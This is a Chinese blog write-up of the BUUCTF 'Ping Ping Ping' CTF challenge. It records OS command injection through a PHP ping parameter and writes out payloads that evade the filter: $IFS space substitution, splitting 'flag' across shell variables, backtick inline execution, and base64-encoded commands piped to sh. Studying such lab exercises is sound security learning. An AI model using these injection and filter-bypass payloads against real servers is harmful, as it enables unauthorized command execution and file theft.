前言
昨晚在一个大佬的博客里看到了名为BUUCTF的一个题库,心想大佬都在上面玩,我这波怎么不得在上面留点自己的痕迹,第二天一大早直接上手,选了ping 这题。内容较为简单,连刷两题,由于之前也接触过关于ping的题,有些经验,然而就在GXYCTF2019上的一篇WP上,刷新了我对绕过的认识,于是乎写下本博客记录所学知识点。
知识点总结
先上题目为敬:
疯狂暗示!!!首先我们这里先随便测试一下,看看有哪些文件。
读一下flag.php,发现不行,试了几次之后读不出来,估计是有很多种过滤,直接看源码吧,下次大家遇到这种题目直接看源码比较好,毕竟它也不会一下子就让你读出来。
先读源码 /?ip=127.0.0.1;cat$IFS$1index.php,看看上面情况 发现被过滤的字符还挺多,怪不得flag读不出来,原来字符串都进行了过滤。
注意到,有下面这一过滤
if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
对于这种过滤,即我们输入的字符串里f l a g不能按顺序出现
针对这种情况,可以试试变量替换,就是前面用别的变量代替flag中的字符,然后再用别的的变量代替实现绕过。
1.变量替换绕过
/?ip=127.0.0.1;c=f;cat$IFS$1$clag.php 被过滤
/?ip=127.0.0.1;b=fl;a=ag;cat$IFS$1$b$a.php 被过滤
/?ip=127.0.0.1;a=ag;c=fl;cat$IFS$1$c$a.php 可以拿到flag
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php 可以拿到flag
/?ip=127.0.0.1;a=g;c=a;cat$IFS$1fl$c$a.php 可以拿到flag
//简单点说就是不要让字符串中出现连续的 f l a g
2.内联执行
/?ip=127.0.0.1;cat$IFS$1`ls`
//$IFS$1 过滤空格,1换其他数字也可以
//返引号的作用就是让 Linux 命令先执行,然后其结果作为参数继续执行
3.还可以用到sh操作
先将cat flag.php进行 base64加密,然后使用sh的脚本执行前面的echo。
关于脚本的简单介绍:简单的说shell就是一个包含若干行Shell或者Linux命令的文件。对于一次编写,多次使用的大量命令,就可以使用单独的文件保存下来,以便日后使用。通常shell脚本以.sh为后缀。在编写shell时,第一行一定要指明系统需要哪种shell解释用户的shell程序,如:#!/bin/sh,#!/bin/bash,#!/bin/csh,,#!/bin/tcsh和,#!/bin/ksh等
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
//用别的好像不行
关于通配符
* 匹配全部字符,一个到多个
? 只能匹配一个
[ ] 表示一个范围
{ } 表示一个序列
[1-8],表示匹配1-8的内容
[!abcdfef] /[^abcdfef]表示匹配的不是abcdfef中的字符
总结
关于这种题解,应该差不多了,下次再碰到要是还不会,说明还是知识掌握的不够多。本篇博文大部分内容来源于这位大佬。
读了绝对不亏之Ping Ping Ping 总结笔记.
6298
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
